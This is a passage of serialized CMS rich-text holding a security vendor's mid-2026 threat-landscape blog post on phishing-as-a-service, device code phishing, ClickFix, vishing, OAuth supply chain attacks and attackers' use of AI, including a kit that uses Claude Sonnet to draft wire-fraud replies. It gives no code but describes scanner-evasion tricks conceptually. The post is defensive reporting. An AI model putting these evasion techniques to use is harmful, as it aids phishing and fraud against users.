scale",{"data":2710,"content":2711,"nodeType":695},{},[2712],{"data":2713,"marks":2714,"value":2715,"nodeType":699},{},[],"The SLH playbook works because it sits on top of an industrialized infrastructure layer that continues to grow. Phishing-as-a-Service platforms, device code phishing kits, ClickFix Malware-as-a-Service providers, vishing operations, and OAuth supply chain attacks have all matured into commodity services — and they're shipping faster than ever.",{"data":2717,"content":2718,"nodeType":769},{},[2719],{"data":2720,"marks":2721,"value":2723,"nodeType":699},{},[2722],{"type":707},"Device code phishing goes mainstream",{"data":2725,"content":2726,"nodeType":695},{},[2727,2731,2737],{"data":2728,"marks":2729,"value":2730,"nodeType":699},{},[],"We're tracking a huge spike in ",{"data":2732,"content":2733,"nodeType":791},{"uri":1355},[2734],{"data":2735,"marks":2736,"value":2570,"nodeType":699},{},[],{"data":2738,"marks":2739,"value":2740,"nodeType":699},{},[]," since the start of 2026, with 25+ distinct kits now offering the technique. At the beginning of the year, we were tracking one or two.",{"data":2742,"content":2743,"nodeType":695},{},[2744,2748,2756,2760,2768,2772,2780,2784,2792],{"data":2745,"marks":2746,"value":2747,"nodeType":699},{},[],"What began with ",{"data":2749,"content":2751,"nodeType":791},{"uri":2750},"https:\u002F\u002Fwww.microsoft.com\u002Fen-us\u002Fsecurity\u002Fblog\u002F2025\u002F02\u002F13\u002Fstorm-2372-conducts-device-code-phishing-campaign\u002F",[2752],{"data":2753,"marks":2754,"value":2755,"nodeType":699},{},[],"Storm-2372's nation-state campaigns",{"data":2757,"marks":2758,"value":2759,"nodeType":699},{},[]," in August 2024 has proliferated through criminal kits like ",{"data":2761,"content":2763,"nodeType":791},{"uri":2762},"https:\u002F\u002Fthehackernews.com\u002F2026\u002F05\u002Fthe-new-phishing-click-how-oauth-consent.html",[2764],{"data":2765,"marks":2766,"value":2767,"nodeType":699},{},[],"EvilTokens",{"data":2769,"marks":2770,"value":2771,"nodeType":699},{},[]," (340+ organizations in its first five weeks), ",{"data":2773,"content":2775,"nodeType":791},{"uri":2774},"https:\u002F\u002Fwww.huntress.com\u002Fblog\u002Fkali365-device-code-phishing-kit",[2776],{"data":2777,"marks":2778,"value":2779,"nodeType":699},{},[],"Kali365",{"data":2781,"marks":2782,"value":2783,"nodeType":699},{},[]," (which earned an FBI public advisory), ",{"data":2785,"content":2787,"nodeType":791},{"uri":2786},"https:\u002F\u002Fblog.talosintelligence.com\u002Fartoken-inside-an-eviltokens-affiliate-panel-targeting-microsoft-365\u002F",[2788],{"data":2789,"marks":2790,"value":2791,"nodeType":699},{},[],"ARToken",{"data":2793,"marks":2794,"value":2795,"nodeType":699},{},[],", DEBULL, Forg365, and many more.",{"data":2797,"content":2801,"nodeType":1041},{"target":2798},{"sys":2799},{"id":2800,"type":1046,"linkType":1047},"7G6ytXRQPWatOyYarqgMK2",[],{"data":2803,"content":2804,"nodeType":695},{},[2805],{"data":2806,"marks":2807,"value":2808,"nodeType":699},{},[],"The existing PhaaS marketplace, previously dominated by AiTM phishing kits as the standard, has also pivoted to take advantage of the demand for the technique.",{"data":2810,"content":2811,"nodeType":695},{},[2812,2816,2824],{"data":2813,"marks":2814,"value":2815,"nodeType":699},{},[],"Established AiTM vendors like Tycoon 2FA have ",{"data":2817,"content":2819,"nodeType":791},{"uri":2818},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fdevice-code-phishing\u002F",[2820],{"data":2821,"marks":2822,"value":2823,"nodeType":699},{},[],"added device code phishing",{"data":2825,"marks":2826,"value":2827,"nodeType":699},{},[]," alongside their existing credential-harvesting capabilities, meaning the same platforms now offer both techniques interchangeably based on what works against a given target. Several kits like Venom, EvilTokens, Kali365 all reportedly offer both capabilities, while many of the detections we see match the signatures for existing kits in our database (for example, with Venom triggering our existing Sneaky2FA detections) — suggesting an overlap in kit developers or their codebases.",{"data":2829,"content":2833,"nodeType":1041},{"target":2830},{"sys":2831},{"id":2832,"type":1046,"linkType":1047},"3urXbEwK0OSjXQ7lOMDEoc",[],{"data":2835,"content":2836,"nodeType":695},{},[2837],{"data":2838,"marks":2839,"value":2840,"nodeType":699},{},[],"When you look at the full picture, it's notable to see a mixture of AiTM and device code kits in our top detected kits, with most of the top 5 now offering both.",{"data":2842,"content":2846,"nodeType":1041},{"target":2843},{"sys":2844},{"id":2845,"type":1046,"linkType":1047},"4ipTS2U4HE1VLSLmA6DJgB",[],{"data":2848,"content":2849,"nodeType":695},{},[2850],{"data":2851,"marks":2852,"value":2853,"nodeType":699},{},[],"PhaaS vendors are pivoting because device code phishing defeats all MFA (including passkeys) by targeting the authorization layer rather than the login. It's also an unfamiliar phishing scenario that most people aren't really prepared for.",{"data":2855,"content":2859,"nodeType":1041},{"target":2856},{"sys":2857},{"id":2858,"type":1046,"linkType":1047},"3UDzUCCizPJhXp3SsoZuSK",[],{"data":2861,"content":2862,"nodeType":695},{},[2863],{"data":2864,"marks":2865,"value":2866,"nodeType":699},{},[],"And because they're being used interchangeably, there's no downside for the attacker. In one recent example, we saw the attack automatically fall back to AiTM after the device code method timed out, giving the operator two shots at the same victim without manual intervention.",{"data":2868,"content":2872,"nodeType":1041},{"target":2869},{"sys":2870},{"id":2871,"type":1046,"linkType":1047},"3SPsKzwBNxl4d9QRukBtwt",[],{"data":2874,"content":2875,"nodeType":769},{},[2876],{"data":2877,"marks":2878,"value":2880,"nodeType":699},{},[2879],{"type":707},"PhaaS platform evolution and evasion",{"data":2882,"content":2883,"nodeType":695},{},[2884,2888,2896,2900,2908,2912,2920],{"data":2885,"marks":2886,"value":2887,"nodeType":699},{},[],"The broader PhaaS ecosystem continues to expand and evolve. New platform launches this quarter include ",{"data":2889,"content":2891,"nodeType":791},{"uri":2890},"https:\u002F\u002Fwww.cloudsek.com\u002Fblog\u002Fbluekit-phishing-as-a-service-phaas",[2892],{"data":2893,"marks":2894,"value":2895,"nodeType":699},{},[],"Bluekit",{"data":2897,"marks":2898,"value":2899,"nodeType":699},{},[],", ",{"data":2901,"content":2903,"nodeType":791},{"uri":2902},"https:\u002F\u002Fabnormal.ai\u002Fblog\u002Fblacksite-aitm-phishing-kit-cloaked-gg",[2904],{"data":2905,"marks":2906,"value":2907,"nodeType":699},{},[],"Blacksite and Cloaked.gg",{"data":2909,"marks":2910,"value":2911,"nodeType":699},{},[]," — offering dedicated anti-scanner cloaking as a service for phishing infrastructure — and ",{"data":2913,"content":2915,"nodeType":791},{"uri":2914},"https:\u002F\u002Fthreatactix.com\u002F2026\u002F07\u002F02\u002Fa-rare-look-inside-the-command-and-control-panel-behind-modern-phishing-operations\u002F",[2916],{"data":2917,"marks":2918,"value":2919,"nodeType":699},{},[],"WackoGinx",{"data":2921,"marks":2922,"value":2923,"nodeType":699},{},[],", a multi-platform C2 panel that enables operators to manage simultaneous phishing campaigns.",{"data":2925,"content":2926,"nodeType":695},{},[2927,2931,2939,2943,2951],{"data":2928,"marks":2929,"value":2930,"nodeType":699},{},[],"Sneaky 2FA changes have also been documented, with what ",{"data":2932,"content":2934,"nodeType":791},{"uri":2933},"https:\u002F\u002Fzerobec.com\u002Fblog\u002Fsneaky-2fa-returns-trusted-sender-tenant-branded-microsoft-365-replay",[2935],{"data":2936,"marks":2937,"value":2938,"nodeType":699},{},[],"ZeroBEC calls \"route polymorphism\"",{"data":2940,"marks":2941,"value":2942,"nodeType":699},{},[]," (a complicated way of saying the kit randomizes URL paths and filenames on every visit) while separately adopting ",{"data":2944,"content":2946,"nodeType":791},{"uri":2945},"https:\u002F\u002Fblog.barracuda.com\u002F2026\u002F06\u002F29\u002Femail-threat-radar-june-2026",[2947],{"data":2948,"marks":2949,"value":2950,"nodeType":699},{},[],"split-click buttons and blob URLs",{"data":2952,"marks":2953,"value":2954,"nodeType":699},{},[]," designed to evade link analysis (where buttons have two links: automated scanners interact with one and see a legitimate Microsoft page, but humans naturally click the larger, more visually prominent bottom one and get routed via a blob URL to the phishing page). ",{"data":2956,"content":2957,"nodeType":695},{},[2958,2962,2970],{"data":2959,"marks":2960,"value":2961,"nodeType":699},{},[],"The speed of technique adoption across these platforms is itself accelerating. ",{"data":2963,"content":2965,"nodeType":791},{"uri":2964},"https:\u002F\u002Fsublime.security\u002Fblog\u002Fflowerstorm-unleashes-the-krakvm-phaas-operators-turn-to-vm-based-obfuscation\u002F",[2966],{"data":2967,"marks":2968,"value":2969,"nodeType":699},{},[],"FlowerStorm adopted",{"data":2971,"marks":2972,"value":2973,"nodeType":699},{},[]," KrakVM (an open-source JavaScript VM that compiles malicious JS into encrypted bytecode, defeating email security static analysis) within a month of KrakVM's public release on GitHub. The gap between a new evasion technique appearing publicly and its incorporation into commodity phishing kits has compressed to weeks.",{"data":2975,"content":2976,"nodeType":695},{},[2977,2981,2989,2993,3001],{"data":2978,"marks":2979,"value":2980,"nodeType":699},{},[],"At the same time, target surfaces are expanding: ",{"data":2982,"content":2984,"nodeType":791},{"uri":2983},"https:\u002F\u002Fsecuritylabs.datadoghq.com\u002Farticles\u002Fbehind-the-console-aws-aitm-phishing-kit-and-beyond\u002F",[2985],{"data":2986,"marks":2987,"value":2988,"nodeType":699},{},[],"Datadog documented",{"data":2990,"marks":2991,"value":2992,"nodeType":699},{},[]," an AWS console AiTM kit that dynamically adapts to the victim's configured second factor (an example of ",{"data":2994,"content":2996,"nodeType":791},{"uri":2995},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fmfa-downgrade-attacks",[2997],{"data":2998,"marks":2999,"value":3000,"nodeType":699},{},[],"MFA downgrade",{"data":3002,"marks":3003,"value":3004,"nodeType":699},{},[]," in the wild), extending AiTM phishing from IdPs and SaaS applications to cloud infrastructure consoles.",{"data":3006,"content":3007,"nodeType":769},{},[3008],{"data":3009,"marks":3010,"value":3012,"nodeType":699},{},[3011],{"type":707},"ClickFix as a service",{"data":3014,"content":3015,"nodeType":695},{},[3016,3020,3028,3032,3040],{"data":3017,"marks":3018,"value":3019,"nodeType":699},{},[],"ClickFix has also continued to industrialize. ",{"data":3021,"content":3023,"nodeType":791},{"uri":3022},"https:\u002F\u002Fblog.sekoia.io\u002Funveiling-errtraffic-inside-a-growing-clickfix-malware-distribution-framework\u002F",[3024],{"data":3025,"marks":3026,"value":3027,"nodeType":699},{},[],"Sekoia documented",{"data":3029,"marks":3030,"value":3031,"nodeType":699},{},[]," the ErrTraffic MaaS platform achieving a 60% victim conversion rate, while researchers ",{"data":3033,"content":3035,"nodeType":791},{"uri":3034},"https:\u002F\u002Fkqlquery.com\u002Fposts\u002Fclickfix-gift-that-keeps-on-giving\u002F",[3036],{"data":3037,"marks":3038,"value":3039,"nodeType":699},{},[],"mapped approximately 3,000 live ClickFix payloads",{"data":3041,"marks":3042,"value":3043,"nodeType":699},{},[]," being served through API-driven backends that dynamically generate uniquely obfuscated payloads per victim — essentially the ClickFix PhaaS equivalent.",{"data":3045,"content":3046,"nodeType":695},{},[3047,3051,3059,3063,3071],{"data":3048,"marks":3049,"value":3050,"nodeType":699},{},[],"The technique has also expanded cross-platform, with Unit 42 documenting ",{"data":3052,"content":3054,"nodeType":791},{"uri":3053},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fnew-macos-clickfix-attack-silently-mounts-dmgs-to-push-infostealer\u002F",[3055],{"data":3056,"marks":3057,"value":3058,"nodeType":699},{},[],"macOS ClickFix variants",{"data":3060,"marks":3061,"value":3062,"nodeType":699},{},[]," that mount DMGs and bypass Gatekeeper to deliver AMOS infostealer. At the mass deployment end, over ",{"data":3064,"content":3066,"nodeType":791},{"uri":3065},"https:\u002F\u002Fblog.xlab.qianxin.com\u002Fghost-cms-mass-compromised-via-cve-2026-26980-now-fueling-clickfix-attacks\u002F",[3067],{"data":3068,"marks":3069,"value":3070,"nodeType":699},{},[],"700 Ghost CMS sites were compromised",{"data":3072,"marks":3073,"value":3074,"nodeType":699},{},[]," to serve ClickFix payloads in May, and the Gizmodo homepage was injected in June.",{"data":3076,"content":3077,"nodeType":695},{},[3078,3082,3090,3094,3102],{"data":3079,"marks":3080,"value":3081,"nodeType":699},{},[],"Nation-state actors are building around ClickFix too. Two DPRK subgroups independently stood up ClickFix infrastructure in July: ",{"data":3083,"content":3085,"nodeType":791},{"uri":3084},"https:\u002F\u002Fthehackernews.com\u002F2026\u002F07\u002Fbluenoroff-zoom-phishing-kit-profiles.html",[3086],{"data":3087,"marks":3088,"value":3089,"nodeType":699},{},[],"BlueNoroff",{"data":3091,"marks":3092,"value":3093,"nodeType":699},{},[]," targeting crypto professionals via Zoom impersonation with wallet profiling before payload delivery, and ",{"data":3095,"content":3097,"nodeType":791},{"uri":3096},"https:\u002F\u002Fsocradar.io\u002Fblog\u002Fdprk-clickfake-pylangghost-golangghost-rats\u002F",[3098],{"data":3099,"marks":3100,"value":3101,"nodeType":699},{},[],"Famous Chollima",{"data":3103,"marks":3104,"value":3105,"nodeType":699},{},[]," embedding ClickFix in multi-stage fake job interviews.",{"data":3107,"content":3108,"nodeType":769},{},[3109],{"data":3110,"marks":3111,"value":3113,"nodeType":699},{},[3112],{"type":707},"Vishing as a payload delivery mechanism",{"data":3115,"content":3116,"nodeType":695},{},[3117],{"data":3118,"marks":3119,"value":3120,"nodeType":699},{},[],"Vishing functions as a reliable delivery mechanism for all of these payloads, leveraged by ShinyHunters, Pink, and Helix (among many others) to deliver AiTM and device code phishing. A human operator on a phone call drives the victim through a browser-based technical payload, and the vishing delivery gets around email security controls.",{"data":3122,"content":3123,"nodeType":695},{},[3124,3128,3136],{"data":3125,"marks":3126,"value":3127,"nodeType":699},{},[],"When Push researchers ",{"data":3129,"content":3131,"nodeType":791},{"uri":3130},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Finside-criminal-phishing-panel\u002F",[3132],{"data":3133,"marks":3134,"value":3135,"nodeType":699},{},[],"infiltrated the phishing panels",{"data":3137,"marks":3138,"value":3139,"nodeType":699},{},[]," linked to ShinyHunters' campaigns, we found the mechanics for a live attacker relaying credentials and pushing new prompts in real time during the call, across 400+ linked domains and four infrastructure clusters.",{"data":3141,"content":3142,"nodeType":695},{},[3143,3147,3155,3159,3167,3171,3179,3183,3191],{"data":3144,"marks":3145,"value":3146,"nodeType":699},{},[],"The financial scale is now quantifiable: ",{"data":3148,"content":3150,"nodeType":791},{"uri":3149},"https:\u002F\u002Fwww.darkreading.com\u002Fcyberattacks-data-breaches\u002Fsilent-ransom-us-law-firms-extortion-attacks",[3151],{"data":3152,"marks":3153,"value":3154,"nodeType":699},{},[],"Luna Moth",{"data":3156,"marks":3157,"value":3158,"nodeType":699},{},[]," (Silent Ransom Group), a ",{"data":3160,"content":3162,"nodeType":791},{"uri":3161},"https:\u002F\u002Fwww.crowdstrike.com\u002Fen-us\u002Fadversaries\u002Fchatty-spider\u002F",[3163],{"data":3164,"marks":3165,"value":3166,"nodeType":699},{},[],"Russia-linked Conti spinoff",{"data":3168,"marks":3169,"value":3170,"nodeType":699},{},[]," operating independently of the Com, has extracted ",{"data":3172,"content":3174,"nodeType":791},{"uri":3173},"https:\u002F\u002Fwww.theinsurer.com\u002Fti\u002Fnews\u002Fexclusive-weil-gotshal-paid-double-digit-millions-in-suppression-payment-to-luna-2026-05-27\u002F",[3175],{"data":3176,"marks":3177,"value":3178,"nodeType":699},{},[],"up to $48 million",{"data":3180,"marks":3181,"value":3182,"nodeType":699},{},[]," from Am Law 100 firms in 2026 alone, with 48 law firms on their leak site and the ",{"data":3184,"content":3186,"nodeType":791},{"uri":3185},"https:\u002F\u002Fwww.ic3.gov\u002FCSA\u002F2026\u002F260526.pdf",[3187],{"data":3188,"marks":3189,"value":3190,"nodeType":699},{},[],"FBI issuing a dedicated flash alert",{"data":3192,"marks":3193,"value":1407,"nodeType":699},{},[],{"data":3195,"content":3196,"nodeType":695},{},[3197,3201,3209,3213,3221],{"data":3198,"marks":3199,"value":3200,"nodeType":699},{},[],"The infrastructure behind these campaigns is industrializing independently. ",{"data":3202,"content":3204,"nodeType":791},{"uri":3203},"https:\u002F\u002Fwww.okta.com\u002Fblog\u002Fthreat-intelligence\u002Fbehind-the-scenes-of-a-vishing-operation\u002F",[3205],{"data":3206,"marks":3207,"value":3208,"nodeType":699},{},[],"Okta obtained access to Work Panel",{"data":3210,"marks":3211,"value":3212,"nodeType":699},{},[],", a multi-tenant vishing MaaS platform where phishing site standup is a one-button operation and callers are deliberately insulated from the credentials they help steal. Zscaler separately ",{"data":3214,"content":3216,"nodeType":791},{"uri":3215},"https:\u002F\u002Fwww.zscaler.com\u002Fblogs\u002Fsecurity-research\u002Fhelpdesk-hijackers-teams-vishing-quick-assist-and-gogrpc-backdoor",[3217],{"data":3218,"marks":3219,"value":3220,"nodeType":699},{},[],"documented a dedicated Teams-vishing initial access broker",{"data":3222,"marks":3223,"value":3224,"nodeType":699},{},[]," operating since January 2026, building bespoke post-access tooling and selling access to ransomware operators.",{"data":3226,"content":3227,"nodeType":769},{},[3228],{"data":3229,"marks":3230,"value":3232,"nodeType":699},{},[3231],{"type":707},"OAuth supply chain attacks",{"data":3234,"content":3235,"nodeType":695},{},[3236,3240,3247],{"data":3237,"marks":3238,"value":3239,"nodeType":699},{},[],"The OAuth supply chain dimension has also continued to produce confirmed victims. The ",{"data":3241,"content":3242,"nodeType":791},{"uri":2577},[3243],{"data":3244,"marks":3245,"value":3246,"nodeType":699},{},[],"Salesloft\u002FDrift supply chain attack",{"data":3248,"marks":3249,"value":3250,"nodeType":699},{},[]," in 2025 set the template: compromise one SaaS vendor, steal OAuth tokens, access 700+ downstream customer Salesforce environments.",{"data":3252,"content":3253,"nodeType":695},{},[3254,3258,3266,3270,3278,3282,3290],{"data":3255,"marks":3256,"value":3257,"nodeType":699},{},[],"In 2026, the ",{"data":3259,"content":3261,"nodeType":791},{"uri":3260},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fvimeo-data-breach-exposes-personal-information-of-119-000-people\u002F",[3262],{"data":3263,"marks":3264,"value":3265,"nodeType":699},{},[],"Anodot compromise",{"data":3267,"marks":3268,"value":3269,"nodeType":699},{},[]," cascaded through to Vimeo, Rockstar Games, and Zara. The ",{"data":3271,"content":3273,"nodeType":791},{"uri":3272},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Funpacking-the-vercel-breach\u002F",[3274],{"data":3275,"marks":3276,"value":3277,"nodeType":699},{},[],"Context.ai → Vercel",{"data":3279,"marks":3280,"value":3281,"nodeType":699},{},[]," breach followed the same structural pattern. And the ",{"data":3283,"content":3285,"nodeType":791},{"uri":3284},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fklue-oauth-breach-victim-list-grows-as-icarus-hackers-claim-attack\u002F",[3286],{"data":3287,"marks":3288,"value":3289,"nodeType":699},{},[],"Klue\u002FIcarus breach",{"data":3291,"marks":3292,"value":3293,"nodeType":699},{},[]," in June — where attackers pivoted from a legacy credential through stored OAuth tokens to exfiltrate Salesforce data from Huntress, Recorded Future, and Jamf among others — showed that OAuth tokens have become a tried and tested lateral movement vector in SaaS environments.",{"data":3295,"content":3296,"nodeType":721},{},[],{"data":3298,"content":3299,"nodeType":725},{},[3300],{"data":3301,"marks":3302,"value":3304,"nodeType":699},{},[3303],{"type":707},"AI is a force multiplier for attackers",{"data":3306,"content":3307,"nodeType":695},{},[3308],{"data":3309,"marks":3310,"value":3311,"nodeType":699},{},[],"Much of the security industry's AI threat discussion has focused on autonomous offensive AI and novel attack classes like prompt injection. But the place where AI is having the most measurable impact right now is less dramatic and more consequential: it's accelerating how the techniques we've already been tracking get built and operated.",{"data":3313,"content":3314,"nodeType":695},{},[3315],{"data":3316,"marks":3317,"value":3318,"nodeType":699},{},[],"The evidence is visible at every layer of the attack chain. Pretty much every phishing kit we come across in 2026 shows clear signs of vibe coding. For the classic AiTM lure, we used to find heavy obfuscation — attackers used to put a lot of effort into hiding their attacks. But now, they're essentially built to be disposable, and are full of verbose comments and nicely named unobfuscated functions. Why bother hiding when you can just spin up a new one? This is particularly notable when it comes to device code phishing, which owes its massive scale-up this year to vibecoded kits. ",{"data":3320,"content":3321,"nodeType":695},{},[3322,3326,3334],{"data":3323,"marks":3324,"value":3325,"nodeType":699},{},[],"You can see more examples of these kits under the hood in our blog post ",{"data":3327,"content":3329,"nodeType":791},{"uri":3328},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Finside-criminal-phishing-panel",[3330],{"data":3331,"marks":3332,"value":3333,"nodeType":699},{},[],"infiltrating a criminal phishing panel. ",{"data":3335,"marks":3336,"value":21,"nodeType":699},{},[],{"data":3338,"content":3342,"nodeType":1041},{"target":3339},{"sys":3340},{"id":3341,"type":1046,"linkType":1047},"01mOiserRBXraawXwQyJNm",[],{"data":3344,"content":3345,"nodeType":695},{},[3346],{"data":3347,"marks":3348,"value":3349,"nodeType":699},{},[],"Beyond vibe-coded kits, attackers are embedding AI as an integrated operational capability. ",{"data":3351,"content":3352,"nodeType":1589},{},[3353,3375,3396,3418,3440],{"data":3354,"content":3355,"nodeType":1593},{},[3356],{"data":3357,"content":3358,"nodeType":695},{},[3359,3363,3371],{"data":3360,"marks":3361,"value":3362,"nodeType":699},{},[],"The first major device code phishing kit identified in the wild, EvilTokens, ",{"data":3364,"content":3366,"nodeType":791},{"uri":3365},"https:\u002F\u002Fwww.huntress.com\u002Fblog\u002Frailway-paas-m365-token-replay-campaign",[3367],{"data":3368,"marks":3369,"value":3370,"nodeType":699},{},[],"heavily used Railway",{"data":3372,"marks":3373,"value":3374,"nodeType":699},{},[],", a PaaS built for vibe coding with prompt-based deployment and teardown of infrastructure. EvilTokens itself packaged AI workflows for email filter bypass, lure tailoring, and identifying high-value mailboxes. ",{"data":3376,"content":3377,"nodeType":1593},{},[3378],{"data":3379,"content":3380,"nodeType":695},{},[3381,3385,3392],{"data":3382,"marks":3383,"value":3384,"nodeType":699},{},[],"Kali365's E2 edition includes an AI-powered BEC module that ",{"data":3386,"content":3387,"nodeType":791},{"uri":2774},[3388],{"data":3389,"marks":3390,"value":3391,"nodeType":699},{},[],"uses Claude Sonnet",{"data":3393,"marks":3394,"value":3395,"nodeType":699},{},[]," to score intercepted conversations for fraud opportunity and draft contextual wire-transfer redirect replies — not an autonomous attack, but an AI-augmented workflow that makes an existing phishing kit more effective.",{"data":3397,"content":3398,"nodeType":1593},{},[3399],{"data":3400,"content":3401,"nodeType":695},{},[3402,3405,3414],{"data":3403,"marks":3404,"value":21,"nodeType":699},{},[],{"data":3406,"content":3408,"nodeType":791},{"uri":3407},"https:\u002F\u002Fthehackernews.com\u002F2026\u002F07\u002Fexposed-server-reveals-ai-assisted.html",[3409],{"data":3410,"marks":3411,"value":3413,"nodeType":699},{},[3412],{"type":799},"Rapid7's analysis of an exposed server",{"data":3415,"marks":3416,"value":3417,"nodeType":699},{},[]," containing a complete phishing toolkit turned up over 1,000 delivery artifacts alongside hardcoded paths to AI coding tools and LLM-style documentation.",{"data":3419,"content":3420,"nodeType":1593},{},[3421],{"data":3422,"content":3423,"nodeType":695},{},[3424,3428,3436],{"data":3425,"marks":3426,"value":3427,"nodeType":699},{},[],"Three independent operators were ",{"data":3429,"content":3431,"nodeType":791},{"uri":3430},"https:\u002F\u002Fthehackernews.com\u002F2026\u002F07\u002Fmisconfigured-server-reveals-three.html",[3432],{"data":3433,"marks":3434,"value":3435,"nodeType":699},{},[],"found running kits from public GitHub forks",{"data":3437,"marks":3438,"value":3439,"nodeType":699},{},[]," with minimal, AI-assisted customization: one had been operating for over a year with 218 victims across 12 countries, running infrastructure that would previously have required significantly more technical ability to maintain. ",{"data":3441,"content":3442,"nodeType":1593},{},[3443],{"data":3444,"content":3445,"nodeType":695},{},[3446,3450,3458],{"data":3447,"marks":3448,"value":3449,"nodeType":699},{},[],"The tooling itself is starting to embed AI as a product feature — ",{"data":3451,"content":3453,"nodeType":791},{"uri":3452},"https:\u002F\u002Fwww.varonis.com\u002Fblog\u002Fdolphin-x-stealer",[3454],{"data":3455,"marks":3456,"value":3457,"nodeType":699},{},[],"Dolphin X",{"data":3459,"marks":3460,"value":3461,"nodeType":699},{},[],", a new MaaS infostealer targeting 300+ applications across browsers, password managers, cloud CLI tools, and crypto wallets, ships an AI Profiler that scores infected machines by application usage and installed software, then delivers daily ranked summaries so operators can prioritize high-value victims from thousands of infections.",{"data":3463,"content":3464,"nodeType":695},{},[3465,3469,3477,3481,3488,3492,3500],{"data":3466,"marks":3467,"value":3468,"nodeType":699},{},[],"AI adoption itself has also become an attack surface. Users searching for AI desktop applications are already looking to download and install software, and attackers are capitalizing on that behavior: a ",{"data":3470,"content":3472,"nodeType":791},{"uri":3471},"https:\u002F\u002Fwww.huntress.com\u002Fblog\u002Ffakeagent-claude-desktop-malvertising-ends-in-dotnet-rat",[3473],{"data":3474,"marks":3475,"value":3476,"nodeType":699},{},[],"malicious Claude.ai Artifact impersonating a download portal",{"data":3478,"marks":3479,"value":3480,"nodeType":699},{},[]," drew 7,100 visits via Bing search ads and compromised 29 organizations in 48 hours, following the ",{"data":3482,"content":3483,"nodeType":791},{"uri":1259},[3484],{"data":3485,"marks":3486,"value":3487,"nodeType":699},{},[],"LLMShare attack pattern",{"data":3489,"marks":3490,"value":3491,"nodeType":699},{},[]," we documented in May. A second campaign, ",{"data":3493,"content":3495,"nodeType":791},{"uri":3494},"https:\u002F\u002Fwww.huntress.com\u002Fblog\u002Fmacsync-stealer-rat-reverse-engineering",[3496],{"data":3497,"marks":3498,"value":3499,"nodeType":699},{},[],"MacSync",{"data":3501,"marks":3502,"value":3503,"nodeType":699},{},[],", used a claude.ai conversation styled as an installation guide to deliver a macOS infostealer via a ClickFix-adjacent terminal paste, also distributed through Google Ads. In both cases, the AI platform's trusted domain carried the malicious content past URL reputation filters.",{"data":3505,"content":3506,"nodeType":769},{},[3507],{"data":3508,"marks":3509,"value":3511,"nodeType":699},{},[3510],{"type":707},"But the core techniques aren't changing",{"data":3513,"content":3514,"nodeType":695},{},[3515,3519,3527],{"data":3516,"marks":3517,"value":3518,"nodeType":699},{},[],"AI compresses the bottom layers of the ",{"data":3520,"content":3522,"nodeType":791},{"uri":3521},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fthe-pyramid-of-pain-in-the-ai-era\u002F",[3523],{"data":3524,"marks":3525,"value":3526,"nodeType":699},{},[],"Pyramid of Pain",{"data":3528,"marks":3529,"value":3530,"nodeType":699},{},[]," (unique hashes, domains, IP addresses, host artifacts) by enabling faster domain rotation, cheaper kit development, and rotating payloads, but the technique-level behaviors remain unchanged.",{"data":3532,"content":3533,"nodeType":695},{},[3534],{"data":3535,"marks":3536,"value":3537,"nodeType":699},{},[],"A phishing page still has to harvest credentials. Device code phishing still has to abuse the authorization grant. ClickFix still has to inject a clipboard payload. Those behavioral signatures are structurally resistant to AI-driven variation because changing them means changing how the attack works.",{"data":3539,"content":3540,"nodeType":721},{},[],{"data":3542,"content":3543,"nodeType":725},{},[3544],{"data":3545,"marks":3546,"value":3548,"nodeType":699},{},[3547],{"type":707},"What this means for defenders",{"data":3550,"content":3551,"nodeType":695},{},[3552],{"data":3553,"marks":3554,"value":3555,"nodeType":699},{},[],"Every trend documented here converges on the same control point: the browser. The AI acceleration that makes all of it faster and cheaper doesn't change where the attacks execute, or how Push intercepts them.",{"data":3557,"content":3558,"nodeType":1589},{},[3559,3569,3579,3589],{"data":3560,"content":3561,"nodeType":1593},{},[3562],{"data":3563,"content":3564,"nodeType":695},{},[3565],{"data":3566,"marks":3567,"value":3568,"nodeType":699},{},[],"For AiTM phishing, Push's behavioral detection analyzes and blocks the phishing page in real time, regardless of which domains or hosting infrastructure the kit uses on any given day.",{"data":3570,"content":3571,"nodeType":1593},{},[3572],{"data":3573,"content":3574,"nodeType":695},{},[3575],{"data":3576,"marks":3577,"value":3578,"nodeType":699},{},[],"For device code phishing, Push detects both the phishing pages associated with device code kits and provides an additional layer on the legitimate device code authentication pages themselves, so users cannot enter attacker-supplied codes.",{"data":3580,"content":3581,"nodeType":1593},{},[3582],{"data":3583,"content":3584,"nodeType":695},{},[3585],{"data":3586,"marks":3587,"value":3588,"nodeType":699},{},[],"For ClickFix, Push detects the clipboard injection at the moment the malicious payload is written.",{"data":3590,"content":3591,"nodeType":1593},{},[3592],{"data":3593,"content":3594,"nodeType":695},{},[3595],{"data":3596,"marks":3597,"value":3598,"nodeType":699},{},[],"For OAuth supply chain attacks, Push monitors and controls consent flows at the browser layer, so security teams can govern which applications obtain tokens in the first place.",{"data":3600,"content":3601,"nodeType":695},{},[3602],{"data":3603,"marks":3604,"value":3605,"nodeType":699},{},[],"As AI enables more kits, more operators, and faster infrastructure rotation, indicator-based defenses that target domains, IPs, and hashes become less effective by the day. Behavioral detection that targets technique-class signatures (what the attack does) is the approach that scales.",{"data":3607,"content":3608,"nodeType":721},{},[],{"data":3610,"content":3611,"nodeType":695},{},[3612],{"data":3613,"marks":3614,"value":909,"nodeType":699},{},[],{"data":3616,"content":3617,"nodeType":695},{},[3618],{"data":3619,"marks":3620,"value":916,"nodeType":699},{},[],{"data":3622,"content":3623,"nodeType":695},{},[3624,3627,3635],{"data":3625,"marks":3626,"value":21,"nodeType":699},{},[],{"data":3628,"content":3630,"nodeType":791},{"uri":3629},"https:\u002F\u002Fpushsecurity.com\u002Fdemo\u002F",[3631],{"data":3632,"marks":3633,"value":930,"nodeType":699},{},[3634],{"type":799},{"data":3636,"marks":3637,"value":21,"nodeType":699},{},[],"Browser threat landscape: mid-year update 2026","PhaaS industrialization, Scattered Spider copycats, and AI-augmented tooling — what the threat landscape looks like in 2026 so 